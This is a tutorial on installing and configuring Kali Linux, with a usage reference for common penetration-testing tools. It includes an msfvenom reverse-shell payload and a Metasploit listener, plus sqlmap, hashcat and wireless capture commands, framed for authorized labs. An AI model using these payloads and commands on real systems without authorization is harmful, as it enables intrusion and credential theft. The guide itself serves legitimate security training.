Kali Linux: Install and First Steps

Kali Linux install and first steps

Tested on: Kali Linux 2026.1 — Last updated: June 2026

Kali Linux is a Debian-based distribution built specifically for penetration testing, digital forensics, and security research. Maintained by Offensive Security, it ships with over 600 pre-installed tools organized into curated metapackages — everything from network scanners to exploitation frameworks. This guide covers every installation method, post-install configuration, and essential tool usage to get you operational fast. New to Kali entirely? Start with What Is Kali Linux? for the background before installing.

Legal notice: Kali's tools are for authorized testing only. Running network scans, exploitation frameworks, or wireless attacks against systems you do not own or have written permission to test is illegal in most jurisdictions. Everything in this guide assumes you are working on systems you control or have explicit authorization to test.

Contents
  1. Kali vs. Other Options for Security Work
  2. Prerequisites
  3. Installation Options
    1. Option 1: Pre-built VM Image (Fastest Start)
    2. Option 2: Bare Metal Install
    3. Option 3: WSL2 on Windows
    4. Option 4: Docker (Disposable Environments)
  4. First Steps After Installing Kali
    1. Update the System
    2. Run kali-tweaks
    3. Install Tool Metapackages
    4. Configure the Metasploit Database
  5. Essential Tools: Usage Reference
    1. Network Reconnaissance with Nmap
    2. Web Application Testing with Burp Suite
    3. Password Cracking
    4. Metasploit Framework
    5. Wireless Testing with Aircrack-ng
  6. VPN Setup for Lab Platforms
  7. Practice Environments
  8. Troubleshooting
    1. airmon-ng fails or wlan0mon doesn't appear
    2. msfconsole shows "No database connected"
    3. Further Reading

Kali vs. Other Options for Security Work

Before installing, understand where Kali fits — and where it doesn't. If Parrot OS is also on your shortlist, see our full Kali Linux vs Parrot OS comparison for the practical differences beyond this quick table:

AspectKali LinuxUbuntu / Parrot OS
Pre-installed tools600+ security toolsGeneral tools only
Release modelRolling releaseFixed LTS cycles
Default shellzsh with custom promptbash
Default userkali (non-root sudo)Regular user
Suited as daily driverNot idealYes
Best use caseDedicated security VM or partitionGeneral dev + manual tool install

Most security practitioners run Kali as a dedicated VM, spinning it up for engagements and keeping a general-purpose distro as their daily driver. Bare metal installs make sense when you need GPU-accelerated password cracking or full hardware access for wireless testing.

Prerequisites

  • A system with at least 4 GB RAM (8 GB recommended for VM use with GUI)
  • 20 GB disk space minimum; 50+ GB if installing the full toolset
  • For VM installs: VirtualBox 7.x or VMware Workstation/Fusion/Player
  • For bare metal: a USB drive (8 GB+) and the Kali installer ISO from kali.org/get-kali
  • Basic familiarity with Linux terminal commands

Installation Options

Option 1: Pre-built VM Image (Fastest Start)

Offensive Security publishes ready-to-import OVA images for VirtualBox and VMware. This is the recommended path for most users — no installer required.

  1. Go to kali.org/get-kali/#kali-virtual-machines and download the image for your hypervisor.
  2. In VirtualBox: File → Import Appliance, select the .ova file, accept defaults.
  3. In VMware: File → Open, select the .vmx file from the extracted archive.
  4. Boot the VM. Default credentials are kali / kali — change them immediately.
# First thing: change the default password
passwd

Option 2: Bare Metal Install

Download the Installer ISO from kali.org, then write it to USB:

# Replace /dev/sdX with your USB device — verify with lsblk first
sudo dd if=kali-linux-2026.1-installer-amd64.iso 
    of=/dev/sdX 
    bs=4M 
    status=progress 
    conv=fsync

Boot from USB and follow the Debian-style graphical installer. Key decisions during install:

  • Set a hostname (e.g., kali or something less obvious for operational security)
  • Create a non-root user — the installer sets this up with sudo access automatically
  • Desktop environment: XFCE is the default and most responsive; choose minimal if running headless
  • Enable full-disk encryption (LUKs) if this is a physical machine used on engagements
  • Install GRUB to the primary disk

Option 3: WSL2 on Windows

# In PowerShell as Administrator
wsl --install -d kali-linux

# After first launch, install the default toolset
sudo apt update && sudo apt install -y kali-linux-default

WSL2 Kali is useful for quick tool access on Windows machines, but lacks full network stack support — wireless attacks and some network tools won't work without workarounds.

Option 4: Docker (Disposable Environments)

docker pull kalilinux/kali-rolling
docker run -it --rm kalilinux/kali-rolling /bin/bash

# Inside the container, install what you need
apt update && apt install -y nmap metasploit-framework

The Docker image ships with almost nothing pre-installed by design — containers are meant to be purpose-built and disposable. For persistent volumes, GUI tool support, and running this on a remote VPS, see Run Kali Linux in Docker.

Installing on a Raspberry Pi instead? The ARM images and Pi-specific setup steps (flashing, headless Wi-Fi, wireless adapter limitations) are covered separately in Install Kali Linux on Raspberry Pi.

First Steps After Installing Kali

Update the System

Because Kali is rolling release, the ISO you downloaded may be weeks behind current packages. Update before doing anything else:

sudo apt update && sudo apt full-upgrade -y
sudo apt autoremove -y

Use full-upgrade rather than upgrade — Kali's rolling updates frequently involve dependency changes that upgrade alone won't resolve.

Run kali-tweaks

kali-tweaks is Kali's official post-install configuration tool. It's a TUI (terminal UI) menu that handles the most common setup tasks without manual config file editing:

kali-tweaks

Work through these sections:

  • Hardening — configure SSH (disable root login, enable/disable the service), and review which services start at boot
  • Network Repositories — switch between default mirrors and community repositories for bleeding-edge tool versions
  • Metapackages — add or remove tool categories without manually hunting package names
  • Shell & Prompt — configure zsh plugins, enable syntax highlighting and autosuggestions, and set your prompt style

Install Tool Metapackages

Kali organizes its tools into metapackages by discipline. The default VM image installs kali-linux-default (~3 GB). Add what you need:

# Full toolset — large download, approximately 15 GB on disk
sudo apt install -y kali-linux-everything

# Install by specific discipline instead
sudo apt install -y kali-tools-web           # Burp Suite, sqlmap, nikto, wfuzz
sudo apt install -y kali-tools-wireless      # Aircrack-ng, Kismet, Bluetooth tools
sudo apt install -y kali-tools-forensics     # Autopsy, Volatility, Sleuth Kit
sudo apt install -y kali-tools-passwords     # Hashcat, John, Hydra, Medusa
sudo apt install -y kali-tools-exploitation  # Metasploit, BeEF, exploitdb
sudo apt install -y kali-tools-sniffing-spoofing  # Wireshark, Ettercap, Responder

# List all available kali metapackages
apt-cache search kali-tools | sort

Configure the Metasploit Database

Metasploit uses PostgreSQL to store scan results, credentials, and session data. Initialize it before first use:

sudo msfdb init

# Verify the database is connected
msfconsole -q -x "db_status; exit"
# Expected output:
[*] Connected to msf. Connection type: postgresql.

Essential Tools: Usage Reference

The commands below cover the tools you'll reach for most. For a longer, bookmarkable reference including service management and OSINT commands, see the full Kali Linux Commands Cheat Sheet.

Network Reconnaissance with Nmap

# Host discovery — find live hosts on a subnet
nmap -sn 192.168.1.0/24

# Standard recon scan: service versions + default scripts
nmap -sV -sC -p- 192.168.1.50

# OS fingerprinting
nmap -O 192.168.1.50

# Aggressive scan (OS, version, scripts, traceroute)
nmap -A 192.168.1.50

# Save output in all formats (normal, grepable, XML)
nmap -sV -sC -oA scan_results 192.168.1.50

# Scan from a target list
nmap -iL targets.txt -sV -oA results

Web Application Testing with Burp Suite

# Launch Burp Suite Community Edition
burpsuite &

# Or from Applications > Web Application Analysis > burpsuite

Set your browser to proxy through 127.0.0.1:8080, then install the Burp CA certificate in your browser to intercept HTTPS traffic. For quick automated scanning:

# Nikto — lightweight web server scanner
nikto -h http://target-ip

# Directory brute-forcing with feroxbuster
feroxbuster -u http://target-ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# SQL injection testing with sqlmap
sqlmap -u "http://target-ip/page?id=1" --dbs

Password Cracking

# Decompress the rockyou wordlist if it's still gzipped
sudo gunzip /usr/share/wordlists/rockyou.txt.gz

# Hashcat — GPU-accelerated (check hash type with hashid first)
hashid '$6$rounds=5000$...'
hashcat -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt  # SHA-512crypt
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt     # MD5
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt  # NTLM

# John the Ripper — CPU-based, handles more hash auto-detection
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt  # Display cracked hashes

Metasploit Framework

msfconsole

# Inside msfconsole:
msf6> search type:exploit platform:linux
msf6> search cve:2021-44228         # Search by CVE
msf6> use exploit/multi/handler
msf6> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6> set LHOST 192.168.1.100
msf6> set LPORT 4444
msf6> run

# Generate a payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp 
    LHOST=192.168.1.100 LPORT=4444 
    -f exe -o payload.exe

Wireless Testing with Aircrack-ng

# List wireless interfaces
iwconfig

# Kill processes that interfere with monitor mode
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0

# Scan for nearby networks
sudo airodump-ng wlan0mon

# Capture a specific network (replace BSSID and channel)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Restore managed mode when done
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

VPN Setup for Lab Platforms

HackTheBox, TryHackMe, and similar platforms provide OpenVPN config files to connect to their lab networks:

sudo apt install -y openvpn

# Connect to a lab VPN (HTB, THM, etc.)
sudo openvpn --config your-lab.ovpn

# Verify tunnel is up
ip a show tun0
# Expected output showing tunnel IP:
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 ...
    inet 10.10.14.25/23 brd 10.10.15.255 scope global tun0

Practice Environments

  • HackTheBox (hackthebox.com) — Start with retired machines; walkthroughs are freely available once a machine retires
  • TryHackMe (tryhackme.com) — Structured learning paths with guided rooms, better for beginners
  • VulnHub (vulnhub.com) — Download vulnerable VMs and run them locally in VirtualBox/VMware
  • DVWA — Damn Vulnerable Web Application for local web testing practice
# Run DVWA locally with Docker
docker run --rm -it -p 80:80 vulnerables/web-dvwa

# Access at http://localhost — default credentials: admin / password

Troubleshooting

airmon-ng fails or wlan0mon doesn't appear

Network managers fighting with monitor mode is the most common wireless issue:

sudo airmon-ng check kill
sudo systemctl stop NetworkManager wpa_supplicant
sudo airmon-ng start wlan0
# When done:
sudo systemctl start NetworkManager

msfconsole shows "No database connected"

PostgreSQL isn't running or the database wasn't initialized:

sudo systemctl start postgresql
sudo msfdb reinit
msfconsole -q -x "db_status; exit"

Go up